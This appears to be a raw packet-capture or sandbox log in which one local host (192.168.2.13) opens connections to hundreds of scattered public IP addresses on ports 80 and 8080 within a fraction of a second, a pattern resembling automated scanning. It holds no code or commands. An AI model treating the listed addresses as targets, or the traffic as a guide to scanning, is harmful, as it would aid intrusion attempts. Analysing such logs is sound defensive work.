                                                        Mar 21, 2024 05:21:47.389131069 CET4996880192.168.2.1383.182.213.232
                                                        Mar 21, 2024 05:21:47.389131069 CET4996880192.168.2.1382.66.233.8
                                                        Mar 21, 2024 05:21:47.389132977 CET5048080192.168.2.13178.30.185.93
                                                        Mar 21, 2024 05:21:47.389132977 CET4996880192.168.2.13200.27.236.99
                                                        Mar 21, 2024 05:21:47.389132977 CET5048080192.168.2.13178.13.126.127
                                                        Mar 21, 2024 05:21:47.389132977 CET5048080192.168.2.13178.128.231.209
                                                        Mar 21, 2024 05:21:47.389132977 CET5048080192.168.2.13178.160.82.212
                                                        Mar 21, 2024 05:21:47.389137983 CET4996880192.168.2.13181.115.40.51
                                                        Mar 21, 2024 05:21:47.389137983 CET5048080192.168.2.13178.111.16.172
                                                        Mar 21, 2024 05:21:47.389146090 CET5048080192.168.2.13178.219.7.203
                                                        Mar 21, 2024 05:21:47.389146090 CET4996880192.168.2.1382.69.156.100
                                                        Mar 21, 2024 05:21:47.389153004 CET4996880192.168.2.13213.130.254.193
                                                        Mar 21, 2024 05:21:47.389158010 CET4996880192.168.2.1383.224.13.178
                                                        Mar 21, 2024 05:21:47.389183044 CET4996880192.168.2.13200.14.163.175
                                                        Mar 21, 2024 05:21:47.389183044 CET5048080192.168.2.13178.174.155.118
                                                        Mar 21, 2024 05:21:47.389193058 CET4996880192.168.2.13200.170.230.223
                                                        Mar 21, 2024 05:21:47.389194965 CET4996880192.168.2.1383.134.173.36
                                                        Mar 21, 2024 05:21:47.389194965 CET5048080192.168.2.13178.32.147.204
                                                        Mar 21, 2024 05:21:47.389194965 CET5048080192.168.2.13178.176.161.213
                                                        Mar 21, 2024 05:21:47.389204025 CET4996880192.168.2.1382.115.186.146
                                                        Mar 21, 2024 05:21:47.389208078 CET5048080192.168.2.13178.43.78.135
                                                        Mar 21, 2024 05:21:47.389214039 CET5048080192.168.2.13178.245.180.55
                                                        Mar 21, 2024 05:21:47.389214039 CET5048080192.168.2.13178.208.211.240
                                                        Mar 21, 2024 05:21:47.389213085 CET4996880192.168.2.13213.187.79.0
                                                        Mar 21, 2024 05:21:47.389214039 CET4996880192.168.2.1382.212.10.153
                                                        Mar 21, 2024 05:21:47.389225006 CET4996880192.168.2.1382.194.139.195
                                                        Mar 21, 2024 05:21:47.389225960 CET4996880192.168.2.13178.244.152.166
                                                        Mar 21, 2024 05:21:47.389225960 CET5048080192.168.2.13178.73.236.224
                                                        Mar 21, 2024 05:21:47.389225960 CET4996880192.168.2.1382.218.4.176
                                                        Mar 21, 2024 05:21:47.389225960 CET5048080192.168.2.13178.225.248.26
                                                        Mar 21, 2024 05:21:47.389225960 CET5048080192.168.2.13178.187.208.201
                                                        Mar 21, 2024 05:21:47.389225960 CET4996880192.168.2.13181.25.31.80
                                                        Mar 21, 2024 05:21:47.389225960 CET5048080192.168.2.13178.7.69.102
                                                        Mar 21, 2024 05:21:47.389242887 CET5048080192.168.2.13178.15.219.74
                                                        Mar 21, 2024 05:21:47.389244080 CET5048080192.168.2.13178.71.119.215
                                                        Mar 21, 2024 05:21:47.389244080 CET4996880192.168.2.13213.166.65.215
                                                        Mar 21, 2024 05:21:47.389246941 CET4996880192.168.2.1383.48.206.168
                                                        Mar 21, 2024 05:21:47.389254093 CET4996880192.168.2.1383.77.110.247
                                                        Mar 21, 2024 05:21:47.389254093 CET5048080192.168.2.13178.150.71.196
                                                        Mar 21, 2024 05:21:47.389261007 CET5048080192.168.2.13178.109.163.136
                                                        Mar 21, 2024 05:21:47.389264107 CET5048080192.168.2.13178.55.48.17
                                                        Mar 21, 2024 05:21:47.389264107 CET5048080192.168.2.13178.98.66.212
                                                        Mar 21, 2024 05:21:47.389266968 CET4996880192.168.2.1386.114.197.98
                                                        Mar 21, 2024 05:21:47.389266968 CET4996880192.168.2.1383.1.237.213
                                                        Mar 21, 2024 05:21:47.389269114 CET5048080192.168.2.13178.100.65.182
                                                        Mar 21, 2024 05:21:47.389272928 CET4996880192.168.2.1386.54.25.83
                                                        Mar 21, 2024 05:21:47.389276981 CET4996880192.168.2.13181.139.110.51
                                                        Mar 21, 2024 05:21:47.389285088 CET4996880192.168.2.1380.193.182.98
                                                        Mar 21, 2024 05:21:47.389295101 CET4996880192.168.2.13206.55.31.128
                                                        Mar 21, 2024 05:21:47.389298916 CET4996880192.168.2.1386.75.122.70
                                                        Mar 21, 2024 05:21:47.389298916 CET4996880192.168.2.13213.40.84.165
                                                        Mar 21, 2024 05:21:47.389303923 CET4996880192.168.2.13181.223.248.129
                                                        Mar 21, 2024 05:21:47.389305115 CET4996880192.168.2.13178.4.6.200
                                                        Mar 21, 2024 05:21:47.389303923 CET4996880192.168.2.13213.152.61.28
                                                        Mar 21, 2024 05:21:47.389312983 CET4996880192.168.2.1380.235.104.132
                                                        Mar 21, 2024 05:21:47.389312983 CET4996880192.168.2.13206.122.4.32
                                                        Mar 21, 2024 05:21:47.389321089 CET4996880192.168.2.13169.59.23.211
                                                        Mar 21, 2024 05:21:47.389321089 CET5048080192.168.2.13178.227.43.185
                                                        Mar 21, 2024 05:21:47.389321089 CET4996880192.168.2.13178.153.166.68
                                                        Mar 21, 2024 05:21:47.389338017 CET4996880192.168.2.13181.58.129.15
                                                        Mar 21, 2024 05:21:47.389337063 CET4996880192.168.2.1383.65.107.186
                                                        Mar 21, 2024 05:21:47.389339924 CET4996880192.168.2.13213.99.9.93
                                                        Mar 21, 2024 05:21:47.389352083 CET4996880192.168.2.1386.71.74.42
                                                        Mar 21, 2024 05:21:47.389357090 CET4996880192.168.2.1380.233.31.249
                                                        Mar 21, 2024 05:21:47.389357090 CET4996880192.168.2.1386.11.119.242
                                                        Mar 21, 2024 05:21:47.389357090 CET4996880192.168.2.13169.212.41.188
                                                        Mar 21, 2024 05:21:47.389364958 CET4996880192.168.2.1386.108.190.131
                                                        Mar 21, 2024 05:21:47.389364958 CET4996880192.168.2.13181.83.21.43
                                                        Mar 21, 2024 05:21:47.389368057 CET4996880192.168.2.13200.54.168.153
                                                        Mar 21, 2024 05:21:47.389368057 CET4996880192.168.2.13213.5.215.14
                                                        Mar 21, 2024 05:21:47.389368057 CET5048080192.168.2.13178.156.235.237
                                                        Mar 21, 2024 05:21:47.389374971 CET4996880192.168.2.1380.250.3.138
                                                        Mar 21, 2024 05:21:47.389384031 CET5048080192.168.2.13178.207.33.184
                                                        Mar 21, 2024 05:21:47.389384031 CET5048080192.168.2.13178.248.52.47
                                                        Mar 21, 2024 05:21:47.389393091 CET5048080192.168.2.13178.155.193.140
                                                        Mar 21, 2024 05:21:47.389393091 CET4996880192.168.2.13178.183.144.52
                                                        Mar 21, 2024 05:21:47.389394045 CET5048080192.168.2.13178.205.119.226
                                                        Mar 21, 2024 05:21:47.389394045 CET5048080192.168.2.13178.2.208.45
                                                        Mar 21, 2024 05:21:47.389416933 CET4996880192.168.2.1383.83.132.153
                                                        Mar 21, 2024 05:21:47.389416933 CET5048080192.168.2.13178.204.219.116
                                                        Mar 21, 2024 05:21:47.389416933 CET5048080192.168.2.13178.185.102.13
                                                        Mar 21, 2024 05:21:47.389416933 CET5048080192.168.2.13178.90.81.17
                                                        Mar 21, 2024 05:21:47.389416933 CET5048080192.168.2.13178.213.244.254
                                                        Mar 21, 2024 05:21:47.389417887 CET5048080192.168.2.13178.227.118.60
                                                        Mar 21, 2024 05:21:47.389424086 CET4996880192.168.2.13200.163.193.52
                                                        Mar 21, 2024 05:21:47.389425993 CET4996880192.168.2.1386.102.6.188
                                                        Mar 21, 2024 05:21:47.389425993 CET4996880192.168.2.1386.219.50.71
                                                        Mar 21, 2024 05:21:47.389425993 CET4996880192.168.2.13206.198.93.10
                                                        Mar 21, 2024 05:21:47.389425993 CET5048080192.168.2.13178.6.135.166
                                                        Mar 21, 2024 05:21:47.389425993 CET5048080192.168.2.13178.72.1.43
                                                        Mar 21, 2024 05:21:47.389434099 CET5048080192.168.2.13178.73.235.111
                                                        Mar 21, 2024 05:21:47.389440060 CET5048080192.168.2.13178.103.238.32
                                                        Mar 21, 2024 05:21:47.389446974 CET5048080192.168.2.13178.117.125.73
                                                        Mar 21, 2024 05:21:47.389452934 CET5048080192.168.2.13178.70.45.158
                                                        Mar 21, 2024 05:21:47.389456987 CET5048080192.168.2.13178.150.39.139
                                                        Mar 21, 2024 05:21:47.389472961 CET5048080192.168.2.13178.248.40.79
                                                        Mar 21, 2024 05:21:47.389501095 CET5048080192.168.2.13178.84.131.151
                                                        Mar 21, 2024 05:21:47.389503956 CET5048080192.168.2.13178.52.21.23
                                                        Mar 21, 2024 05:21:47.389503956 CET5048080192.168.2.13178.224.211.248
                                                        Mar 21, 2024 05:21:47.389508009 CET5048080192.168.2.13178.180.237.140
                                                        Mar 21, 2024 05:21:47.389512062 CET5048080192.168.2.13178.205.229.73
                                                        Mar 21, 2024 05:21:47.389537096 CET5048080192.168.2.13178.115.132.136
                                                        Mar 21, 2024 05:21:47.389539003 CET5048080192.168.2.13178.80.176.97
                                                        Mar 21, 2024 05:21:47.389539003 CET5048080192.168.2.13178.238.102.111
                                                        Mar 21, 2024 05:21:47.389542103 CET5048080192.168.2.13178.146.213.42
                                                        Mar 21, 2024 05:21:47.389542103 CET5048080192.168.2.13178.74.130.102
                                                        Mar 21, 2024 05:21:47.389542103 CET5048080192.168.2.13178.199.36.35
                                                        Mar 21, 2024 05:21:47.389552116 CET5048080192.168.2.13178.150.77.0
                                                        Mar 21, 2024 05:21:47.389583111 CET5048080192.168.2.13178.243.134.96
                                                        Mar 21, 2024 05:21:47.389585972 CET5048080192.168.2.13178.101.110.247
                                                        Mar 21, 2024 05:21:47.389589071 CET5048080192.168.2.13178.28.139.152
                                                        Mar 21, 2024 05:21:47.389592886 CET5048080192.168.2.13178.103.99.4
                                                        Mar 21, 2024 05:21:47.389594078 CET5048080192.168.2.13178.44.208.203
                                                        Mar 21, 2024 05:21:47.389640093 CET5048080192.168.2.13178.153.116.54
                                                        Mar 21, 2024 05:21:47.389647007 CET5048080192.168.2.13178.224.129.59
                                                        Mar 21, 2024 05:21:47.389653921 CET5048080192.168.2.13178.75.85.120
                                                        Mar 21, 2024 05:21:47.389656067 CET5048080192.168.2.13178.241.171.179
                                                        Mar 21, 2024 05:21:47.389661074 CET5048080192.168.2.13178.101.196.13
                                                        Mar 21, 2024 05:21:47.389666080 CET5048080192.168.2.13178.7.75.231
                                                        Mar 21, 2024 05:21:47.389672041 CET5048080192.168.2.13178.205.238.238
                                                        Mar 21, 2024 05:21:47.389672041 CET5048080192.168.2.13178.173.129.126
                                                        Mar 21, 2024 05:21:47.389674902 CET5048080192.168.2.13178.57.180.144
                                                        Mar 21, 2024 05:21:47.389676094 CET5048080192.168.2.13178.75.111.119
                                                        Mar 21, 2024 05:21:47.389674902 CET5048080192.168.2.13178.32.25.179
                                                        Mar 21, 2024 05:21:47.389679909 CET5048080192.168.2.13178.226.174.143
                                                        Mar 21, 2024 05:21:47.389689922 CET5048080192.168.2.13178.150.86.108
                                                        Mar 21, 2024 05:21:47.389699936 CET5048080192.168.2.13178.114.167.19
                                                        Mar 21, 2024 05:21:47.389698982 CET5048080192.168.2.13178.234.52.30
                                                        Mar 21, 2024 05:21:47.389707088 CET5048080192.168.2.13178.10.240.218
                                                        Mar 21, 2024 05:21:47.389734983 CET5048080192.168.2.13178.16.234.210
                                                        Mar 21, 2024 05:21:47.389750004 CET5048080192.168.2.13178.66.70.83
                                                        Mar 21, 2024 05:21:47.389764071 CET5048080192.168.2.13178.188.207.201
                                                        Mar 21, 2024 05:21:47.389766932 CET5048080192.168.2.13178.231.47.42
                                                        Mar 21, 2024 05:21:47.389767885 CET5048080192.168.2.13178.59.203.246
                                                        Mar 21, 2024 05:21:47.389777899 CET5048080192.168.2.13178.103.210.27
                                                        Mar 21, 2024 05:21:47.389777899 CET5048080192.168.2.13178.88.60.82
                                                        Mar 21, 2024 05:21:47.389794111 CET5048080192.168.2.13178.113.144.74
                                                        Mar 21, 2024 05:21:47.389794111 CET5048080192.168.2.13178.188.149.22
                                                        Mar 21, 2024 05:21:47.389797926 CET5048080192.168.2.13178.169.148.226
                                                        Mar 21, 2024 05:21:47.389803886 CET5048080192.168.2.13178.175.70.14
                                                        Mar 21, 2024 05:21:47.389822006 CET5048080192.168.2.13178.12.208.25
                                                        Mar 21, 2024 05:21:47.389822006 CET5048080192.168.2.13178.155.245.109
                                                        Mar 21, 2024 05:21:47.389843941 CET5048080192.168.2.13178.16.142.180
                                                        Mar 21, 2024 05:21:47.389863014 CET5048080192.168.2.13178.127.78.0
                                                        Mar 21, 2024 05:21:47.389863014 CET5048080192.168.2.13178.10.222.15
                                                        Mar 21, 2024 05:21:47.389868975 CET5048080192.168.2.13178.115.35.135
                                                        Mar 21, 2024 05:21:47.389877081 CET5048080192.168.2.13178.25.198.18
                                                        Mar 21, 2024 05:21:47.389877081 CET5048080192.168.2.13178.138.33.113
                                                        Mar 21, 2024 05:21:47.389883041 CET5048080192.168.2.13178.86.46.17
                                                        Mar 21, 2024 05:21:47.389889002 CET5048080192.168.2.13178.166.197.156
                                                        Mar 21, 2024 05:21:47.389892101 CET5048080192.168.2.13178.243.160.241
                                                        Mar 21, 2024 05:21:47.389909983 CET5048080192.168.2.13178.139.11.200
                                                        Mar 21, 2024 05:21:47.389920950 CET5048080192.168.2.13178.165.43.123
                                                        Mar 21, 2024 05:21:47.389924049 CET5048080192.168.2.13178.31.152.214
                                                        Mar 21, 2024 05:21:47.389928102 CET5048080192.168.2.13178.165.132.70
                                                        Mar 21, 2024 05:21:47.389946938 CET5048080192.168.2.13178.25.47.214
                                                        Mar 21, 2024 05:21:47.389946938 CET5048080192.168.2.13178.115.212.232
                                                        Mar 21, 2024 05:21:47.389955044 CET5048080192.168.2.13178.196.191.114
                                                        Mar 21, 2024 05:21:47.389971018 CET5048080192.168.2.13178.238.173.104
                                                        Mar 21, 2024 05:21:47.389972925 CET5048080192.168.2.13178.81.105.131
                                                        Mar 21, 2024 05:21:47.389972925 CET5048080192.168.2.13178.180.196.206
                                                        Mar 21, 2024 05:21:47.389978886 CET5048080192.168.2.13178.103.144.208
                                                        Mar 21, 2024 05:21:47.389995098 CET5048080192.168.2.13178.156.74.52
                                                        Mar 21, 2024 05:21:47.390002012 CET497128080192.168.2.1398.123.87.105
                                                        Mar 21, 2024 05:21:47.390006065 CET5048080192.168.2.13178.165.245.170
                                                        Mar 21, 2024 05:21:47.390008926 CET5048080192.168.2.13178.193.53.59
                                                        Mar 21, 2024 05:21:47.390012026 CET5048080192.168.2.13178.80.1.175
                                                        Mar 21, 2024 05:21:47.390018940 CET497128080192.168.2.1398.198.177.106
                                                        Mar 21, 2024 05:21:47.390023947 CET497128080192.168.2.13172.208.73.118
                                                        Mar 21, 2024 05:21:47.390026093 CET5048080192.168.2.13178.67.149.153
                                                        Mar 21, 2024 05:21:47.390026093 CET5048080192.168.2.13178.85.54.127
                                                        Mar 21, 2024 05:21:47.390031099 CET5048080192.168.2.13178.197.102.174
                                                        Mar 21, 2024 05:21:47.390032053 CET497128080192.168.2.13184.184.189.238
                                                        Mar 21, 2024 05:21:47.390043020 CET5048080192.168.2.13178.240.145.63
                                                        Mar 21, 2024 05:21:47.390050888 CET497128080192.168.2.1398.86.50.67
                                                        Mar 21, 2024 05:21:47.390050888 CET5048080192.168.2.13178.236.45.168
                                                        Mar 21, 2024 05:21:47.390067101 CET5048080192.168.2.13178.41.118.224
                                                        Mar 21, 2024 05:21:47.390072107 CET497128080192.168.2.1398.104.214.184
                                                        Mar 21, 2024 05:21:47.390072107 CET497128080192.168.2.1398.181.47.43
                                                        Mar 21, 2024 05:21:47.390073061 CET497128080192.168.2.13172.238.216.53
                                                        Mar 21, 2024 05:21:47.390073061 CET5048080192.168.2.13178.191.202.188
                                                        Mar 21, 2024 05:21:47.390073061 CET497128080192.168.2.13184.83.177.115
                                                        Mar 21, 2024 05:21:47.390075922 CET5048080192.168.2.13178.225.67.14
                                                        Mar 21, 2024 05:21:47.390077114 CET5048080192.168.2.13178.150.197.219
                                                        Mar 21, 2024 05:21:47.390077114 CET497128080192.168.2.1398.104.207.60
                                                        Mar 21, 2024 05:21:47.390077114 CET497128080192.168.2.13172.141.5.238
                                                        Mar 21, 2024 05:21:47.390077114 CET5048080192.168.2.13178.15.207.181
                                                        Mar 21, 2024 05:21:47.390085936 CET5048080192.168.2.13178.110.168.121
                                                        Mar 21, 2024 05:21:47.390085936 CET5048080192.168.2.13178.47.226.98
                                                        Mar 21, 2024 05:21:47.390090942 CET5048080192.168.2.13178.15.131.163
                                                        Mar 21, 2024 05:21:47.390090942 CET5048080192.168.2.13178.32.144.137
                                                        Mar 21, 2024 05:21:47.390094995 CET5048080192.168.2.13178.121.168.131
                                                        Mar 21, 2024 05:21:47.390094995 CET497128080192.168.2.13184.221.126.139
                                                        Mar 21, 2024 05:21:47.390095949 CET497128080192.168.2.1398.223.28.24
                                                        Mar 21, 2024 05:21:47.390113115 CET497128080192.168.2.13184.148.161.6
                                                        Mar 21, 2024 05:21:47.390113115 CET5048080192.168.2.13178.101.18.0
                                                        Mar 21, 2024 05:21:47.390126944 CET497128080192.168.2.1398.174.43.114
                                                        Mar 21, 2024 05:21:47.390131950 CET497128080192.168.2.1398.17.70.6
                                                        Mar 21, 2024 05:21:47.390131950 CET5048080192.168.2.13178.26.11.1
                                                        Mar 21, 2024 05:21:47.390136003 CET5048080192.168.2.13178.34.151.215
                                                        Mar 21, 2024 05:21:47.390136003 CET497128080192.168.2.13172.13.239.18
                                                        Mar 21, 2024 05:21:47.390140057 CET497128080192.168.2.1398.53.62.205
                                                        Mar 21, 2024 05:21:47.390141010 CET497128080192.168.2.13172.109.215.173
                                                        Mar 21, 2024 05:21:47.390146971 CET5048080192.168.2.13178.143.180.46
                                                        Mar 21, 2024 05:21:47.390151978 CET5048080192.168.2.13178.205.52.147
                                                        Mar 21, 2024 05:21:47.390152931 CET497128080192.168.2.13184.252.137.34
                                                        Mar 21, 2024 05:21:47.390155077 CET497128080192.168.2.13172.160.18.19
                                                        Mar 21, 2024 05:21:47.390160084 CET497128080192.168.2.13172.252.135.1
                                                        Mar 21, 2024 05:21:47.390160084 CET497128080192.168.2.13184.169.254.245
                                                        Mar 21, 2024 05:21:47.390166044 CET497128080192.168.2.13184.113.91.99
                                                        Mar 21, 2024 05:21:47.390170097 CET5048080192.168.2.13178.250.45.104
                                                        Mar 21, 2024 05:21:47.390170097 CET5048080192.168.2.13178.187.179.71
                                                        Mar 21, 2024 05:21:47.390172005 CET497128080192.168.2.13184.54.86.105
                                                        Mar 21, 2024 05:21:47.390172005 CET497128080192.168.2.1398.200.213.43
                                                        Mar 21, 2024 05:21:47.390178919 CET497128080192.168.2.1398.79.48.123
                                                        Mar 21, 2024 05:21:47.390192032 CET5048080192.168.2.13178.20.171.125
                                                        Mar 21, 2024 05:21:47.390192986 CET497128080192.168.2.13184.110.125.66
                                                        Mar 21, 2024 05:21:47.390192032 CET5048080192.168.2.13178.166.199.219
                                                        Mar 21, 2024 05:21:47.390197039 CET497128080192.168.2.13184.209.104.221
                                                        Mar 21, 2024 05:21:47.390192986 CET497128080192.168.2.1398.186.40.228
                                                        Mar 21, 2024 05:21:47.390197039 CET497128080192.168.2.13172.155.167.245
                                                        Mar 21, 2024 05:21:47.390192986 CET497128080192.168.2.13172.150.121.152
                                                        Mar 21, 2024 05:21:47.390192986 CET5048080192.168.2.13178.204.35.137
                                                        Mar 21, 2024 05:21:47.390192986 CET5048080192.168.2.13178.61.245.209
                                                        Mar 21, 2024 05:21:47.390212059 CET5048080192.168.2.13178.58.192.138
                                                        Mar 21, 2024 05:21:47.390212059 CET5048080192.168.2.13178.128.199.62
                                                        Mar 21, 2024 05:21:47.390212059 CET497128080192.168.2.1398.161.211.163
                                                        Mar 21, 2024 05:21:47.390212059 CET5048080192.168.2.13178.163.30.197
                                                        Mar 21, 2024 05:21:47.390212059 CET497128080192.168.2.1398.167.30.62
                                                        Mar 21, 2024 05:21:47.390218019 CET497128080192.168.2.13184.154.198.234
                                                        Mar 21, 2024 05:21:47.390221119 CET497128080192.168.2.13172.72.31.156
                                                        Mar 21, 2024 05:21:47.390222073 CET497128080192.168.2.1398.235.160.187
                                                        Mar 21, 2024 05:21:47.390228033 CET5048080192.168.2.13178.53.149.4
                                                        Mar 21, 2024 05:21:47.390228987 CET5048080192.168.2.13178.170.234.154
                                                        Mar 21, 2024 05:21:47.390228033 CET497128080192.168.2.1398.45.17.214
                                                        Mar 21, 2024 05:21:47.390254974 CET5048080192.168.2.13178.80.72.93
                                                        Mar 21, 2024 05:21:47.390254974 CET5048080192.168.2.13178.220.78.51
                                                        Mar 21, 2024 05:21:47.390259981 CET5048080192.168.2.13178.114.129.30
                                                        Mar 21, 2024 05:21:47.390259981 CET497128080192.168.2.13172.127.145.117
                                                        Mar 21, 2024 05:21:47.390259981 CET497128080192.168.2.13184.189.116.239
                                                        Mar 21, 2024 05:21:47.390264034 CET497128080192.168.2.13172.137.121.114
                                                        Mar 21, 2024 05:21:47.390264034 CET497128080192.168.2.13172.64.20.25
                                                        Mar 21, 2024 05:21:47.390259981 CET497128080192.168.2.13184.121.79.170
                                                        Mar 21, 2024 05:21:47.390279055 CET497128080192.168.2.1398.122.146.91
                                                        Mar 21, 2024 05:21:47.390279055 CET5048080192.168.2.13178.153.130.26
                                                        Mar 21, 2024 05:21:47.390279055 CET497128080192.168.2.1398.89.22.64
                                                        Mar 21, 2024 05:21:47.390283108 CET5048080192.168.2.13178.109.254.190
                                                        Mar 21, 2024 05:21:47.390297890 CET5048080192.168.2.13178.248.240.145
                                                        Mar 21, 2024 05:21:47.390307903 CET5048080192.168.2.13178.74.239.216
                                                        Mar 21, 2024 05:21:47.390309095 CET497128080192.168.2.13184.1.91.212
                                                        Mar 21, 2024 05:21:47.390309095 CET497128080192.168.2.13172.166.128.136
                                                        Mar 21, 2024 05:21:47.390309095 CET497128080192.168.2.13172.206.217.19
                                                        Mar 21, 2024 05:21:47.390316010 CET5048080192.168.2.13178.40.176.184
                                                        Mar 21, 2024 05:21:47.390320063 CET5048080192.168.2.13178.83.200.86
                                                        Mar 21, 2024 05:21:47.390320063 CET5048080192.168.2.13178.232.87.34
                                                        Mar 21, 2024 05:21:47.390324116 CET497128080192.168.2.13184.114.78.201
                                                        Mar 21, 2024 05:21:47.390326023 CET5048080192.168.2.13178.21.205.40
                                                        Mar 21, 2024 05:21:47.390326023 CET497128080192.168.2.13184.253.139.141
                                                        Mar 21, 2024 05:21:47.390326023 CET497128080192.168.2.13184.145.176.245
                                                        Mar 21, 2024 05:21:47.390326023 CET497128080192.168.2.1398.53.129.132
                                                        Mar 21, 2024 05:21:47.390326023 CET5048080192.168.2.13178.50.149.93
                                                        Mar 21, 2024 05:21:47.390331030 CET5048080192.168.2.13178.25.7.90
                                                        Mar 21, 2024 05:21:47.390331984 CET497128080192.168.2.1398.122.107.211
                                                        Mar 21, 2024 05:21:47.390340090 CET5048080192.168.2.13178.53.117.193
                                                        Mar 21, 2024 05:21:47.390341043 CET497128080192.168.2.13184.210.198.96
                                                        Mar 21, 2024 05:21:47.390342951 CET5048080192.168.2.13178.241.6.151
                                                        Mar 21, 2024 05:21:47.390352011 CET5048080192.168.2.13178.139.138.138
                                                        Mar 21, 2024 05:21:47.390352964 CET5048080192.168.2.13178.201.103.114
                                                        Mar 21, 2024 05:21:47.390356064 CET5048080192.168.2.13178.223.65.253
                                                        Mar 21, 2024 05:21:47.390356064 CET497128080192.168.2.13172.52.197.153
                                                        Mar 21, 2024 05:21:47.390362978 CET497128080192.168.2.13184.183.120.250
                                                        Mar 21, 2024 05:21:47.390368938 CET5048080192.168.2.13178.195.196.187
                                                        Mar 21, 2024 05:21:47.390378952 CET5048080192.168.2.13178.2.174.9
                                                        Mar 21, 2024 05:21:47.390388966 CET497128080192.168.2.1398.193.119.49
                                                        Mar 21, 2024 05:21:47.390400887 CET497128080192.168.2.13172.18.34.235
                                                        Mar 21, 2024 05:21:47.390403986 CET5048080192.168.2.13178.232.137.67
                                                        Mar 21, 2024 05:21:47.390403986 CET497128080192.168.2.13184.242.182.134
                                                        Mar 21, 2024 05:21:47.390403986 CET5048080192.168.2.13178.139.213.69
                                                        Mar 21, 2024 05:21:47.390403986 CET497128080192.168.2.13184.55.111.107
                                                        Mar 21, 2024 05:21:47.390403986 CET5048080192.168.2.13178.100.142.82
                                                        Mar 21, 2024 05:21:47.390420914 CET497128080192.168.2.1398.0.234.62
                                                        Mar 21, 2024 05:21:47.390425920 CET5048080192.168.2.13178.93.94.21
                                                        Mar 21, 2024 05:21:47.390425920 CET5048080192.168.2.13178.97.11.158
                                                        Mar 21, 2024 05:21:47.390433073 CET497128080192.168.2.13184.51.245.41
                                                        Mar 21, 2024 05:21:47.390434027 CET497128080192.168.2.13172.37.245.137
                                                        Mar 21, 2024 05:21:47.390434027 CET5048080192.168.2.13178.105.55.186
                                                        Mar 21, 2024 05:21:47.390434027 CET5048080192.168.2.13178.191.3.229
                                                        Mar 21, 2024 05:21:47.390434027 CET497128080192.168.2.13172.117.110.170
                                                        Mar 21, 2024 05:21:47.390434027 CET497128080192.168.2.1398.185.92.24
                                                        Mar 21, 2024 05:21:47.390434027 CET497128080192.168.2.1398.81.205.32
                                                        Mar 21, 2024 05:21:47.390440941 CET5048080192.168.2.13178.4.155.194
                                                        Mar 21, 2024 05:21:47.390449047 CET497128080192.168.2.13184.73.1.125
                                                        Mar 21, 2024 05:21:47.390449047 CET497128080192.168.2.13172.53.125.87
                                                        Mar 21, 2024 05:21:47.390449047 CET497128080192.168.2.13172.165.167.91
                                                        Mar 21, 2024 05:21:47.390450954 CET497128080192.168.2.13172.105.215.43
                                                        Mar 21, 2024 05:21:47.390454054 CET5048080192.168.2.13178.86.108.118
                                                        Mar 21, 2024 05:21:47.390454054 CET497128080192.168.2.13172.149.195.53
                                                        Mar 21, 2024 05:21:47.390455961 CET5048080192.168.2.13178.26.31.141
                                                        Mar 21, 2024 05:21:47.390461922 CET5048080192.168.2.13178.211.125.4
                                                        Mar 21, 2024 05:21:47.390465021 CET5048080192.168.2.13178.148.120.88
                                                        Mar 21, 2024 05:21:47.390465021 CET497128080192.168.2.13184.87.208.104
                                                        Mar 21, 2024 05:21:47.390486956 CET497128080192.168.2.13184.7.15.125
                                                        Mar 21, 2024 05:21:47.390487909 CET5048080192.168.2.13178.112.107.18
                                                        Mar 21, 2024 05:21:47.390487909 CET5048080192.168.2.13178.213.118.90
                                                        Mar 21, 2024 05:21:47.390490055 CET497128080192.168.2.13172.138.183.217
                                                        Mar 21, 2024 05:21:47.390490055 CET5048080192.168.2.13178.84.83.72
                                                        Mar 21, 2024 05:21:47.390490055 CET5048080192.168.2.13178.109.239.35
                                                        Mar 21, 2024 05:21:47.390490055 CET497128080192.168.2.13184.139.31.196
                                                        Mar 21, 2024 05:21:47.390490055 CET5048080192.168.2.13178.237.202.212
                                                        Mar 21, 2024 05:21:47.390494108 CET497128080192.168.2.13172.21.175.93
                                                        Mar 21, 2024 05:21:47.390499115 CET5048080192.168.2.13178.12.42.216
                                                        Mar 21, 2024 05:21:47.390499115 CET497128080192.168.2.13184.170.84.140
                                                        Mar 21, 2024 05:21:47.390507936 CET497128080192.168.2.13184.243.244.97
                                                        Mar 21, 2024 05:21:47.390507936 CET497128080192.168.2.13172.54.60.99
                                                        Mar 21, 2024 05:21:47.390516043 CET497128080192.168.2.13184.179.189.134
                                                        Mar 21, 2024 05:21:47.390530109 CET497128080192.168.2.13172.136.181.231
                                                        Mar 21, 2024 05:21:47.390532017 CET497128080192.168.2.13172.182.203.21
                                                        Mar 21, 2024 05:21:47.390537024 CET497128080192.168.2.1398.6.139.139
                                                        Mar 21, 2024 05:21:47.390547037 CET497128080192.168.2.13184.205.52.64
                                                        Mar 21, 2024 05:21:47.390559912 CET497128080192.168.2.13184.147.32.231
                                                        Mar 21, 2024 05:21:47.390567064 CET5048080192.168.2.13178.6.38.105
                                                        Mar 21, 2024 05:21:47.390573025 CET5048080192.168.2.13178.142.27.185
                                                        Mar 21, 2024 05:21:47.390571117 CET497128080192.168.2.13184.146.135.251
                                                        Mar 21, 2024 05:21:47.390575886 CET5048080192.168.2.13178.185.131.24
                                                        Mar 21, 2024 05:21:47.390577078 CET5048080192.168.2.13178.9.108.85
                                                        Mar 21, 2024 05:21:47.390575886 CET497128080192.168.2.13172.243.34.25
                                                        Mar 21, 2024 05:21:47.390582085 CET497128080192.168.2.1398.252.195.179
                                                        Mar 21, 2024 05:21:47.390575886 CET497128080192.168.2.13172.154.28.100
                                                        Mar 21, 2024 05:21:47.390582085 CET5048080192.168.2.13178.134.213.5
                                                        Mar 21, 2024 05:21:47.390575886 CET5048080192.168.2.13178.183.35.31
                                                        Mar 21, 2024 05:21:47.390575886 CET497128080192.168.2.13172.242.220.196
                                                        Mar 21, 2024 05:21:47.390577078 CET497128080192.168.2.13184.92.66.66
                                                        Mar 21, 2024 05:21:47.390575886 CET5048080192.168.2.13178.26.89.240
                                                        Mar 21, 2024 05:21:47.390598059 CET5048080192.168.2.13178.26.105.16
                                                        Mar 21, 2024 05:21:47.390598059 CET5048080192.168.2.13178.157.254.214
                                                        Mar 21, 2024 05:21:47.390609026 CET5048080192.168.2.13178.65.172.3
                                                        Mar 21, 2024 05:21:47.390626907 CET5048080192.168.2.13178.73.33.132
                                                        Mar 21, 2024 05:21:47.390633106 CET497128080192.168.2.13172.82.97.33
                                                        Mar 21, 2024 05:21:47.390633106 CET5048080192.168.2.13178.46.19.109
                                                        Mar 21, 2024 05:21:47.390633106 CET497128080192.168.2.1398.109.106.104
